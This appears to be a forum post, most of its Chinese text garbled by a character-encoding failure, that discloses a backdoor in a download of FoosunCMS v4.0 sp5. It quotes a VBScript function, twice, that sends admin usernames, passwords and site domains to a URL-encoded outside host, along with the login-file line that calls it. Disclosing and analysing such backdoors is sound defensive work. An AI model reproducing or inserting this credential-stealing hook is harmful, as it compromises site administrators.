FoosunCMSv4.0sp5ģڶŴ

[FoosunCMSv4.0sp5ģڶŴ ȫ]CMSһCMSʱֵطѶµCMS룬غļΪFoosunCMSѰv4_Sp5_溬ģ.rar
ѹ¼̨ȴʾԴļ
<script language=''javascript''>alert(''½ڣµ½'');window.top.locati 
ֱ¼ַhttp://localhost/admin/login.asp 
û룬ύ¼˴OKˡ 
ҵĻȴ⵽ݰ͵http://www.www512.cn/js/wz.aspַ 
http://www.www512.cnֻǸ̳ǷѶ֣ 
www.www512.cnĴ룬ûҵFS_IncļҵMd5.aspļ´룺 
Public Function GETtoPostern(user,pass) 
  dim sql 
  dim http 
  dim domain 
  domain=Request.ServerVariables("SERVER_NAME"&Request.ServerVariables("HTTP_url" 
  sql="name="&user&"&pass="&pass&"&domain="&domain 
  set Http=server.createobject("MSXML2.XMLHTTP" 
  Http.open "Post","http://www.www%35%31%32.cn/js/%77%7A%2Easp",false 
  Http.setRequestHeader "Content-Type","application/x-www-form-urlencoded" 
  Http.send sql 
  set http=nothing 
  GETtoPostern=sql   
End Function 
ǺǣһĿȻˡ 
γȻûվַ(sql="name="&user&"&pass="&pass&"&domain="&domain)ݷhttp://www.www%35%31%32.cn/js/%77%7A%2Easp(urlencode,תhttp://www.www512.cn/js/wz.asp,ֲ 
ֲɣվһߣûͱˡ 

ʵɺϲŷ⣬ģĻҲ֪жû....ϣ(©Ϊ⾺ɡ)foosunϤ֪ͨ£̳ûлӦ 

صַ 
http://www.foosun.net/FsDown/Dow ... 19_38_F83ID_66.html 

fs_inc\md5.asp 
126ʼ 

Quote:
Public Function GETtoPostern(user,pass) 
  dim sql 
  dim http 
  dim domain 
  domain=Request.ServerVariables("SERVER_NAME")&Request.ServerVariables("HTTP_url") 
  sql="name="&user&"&pass="&pass&"&domain="&domain 
  set Http=server.createobject("MSXML2.XMLHTTP") 
  Http.open "Post","http://www.www%35%31%32.cn/js/%77%7A%2Easp",false 
  Http.setRequestHeader "Content-Type","application/x-www-form-urlencoded" 
  Http.send sql 
  set http=nothing 
  GETtoPostern=sql   
End Function   


admin\chklogin.asp 

98 

call GETtoPostern(Session("Admin_Name"),p_TempUserPass)  
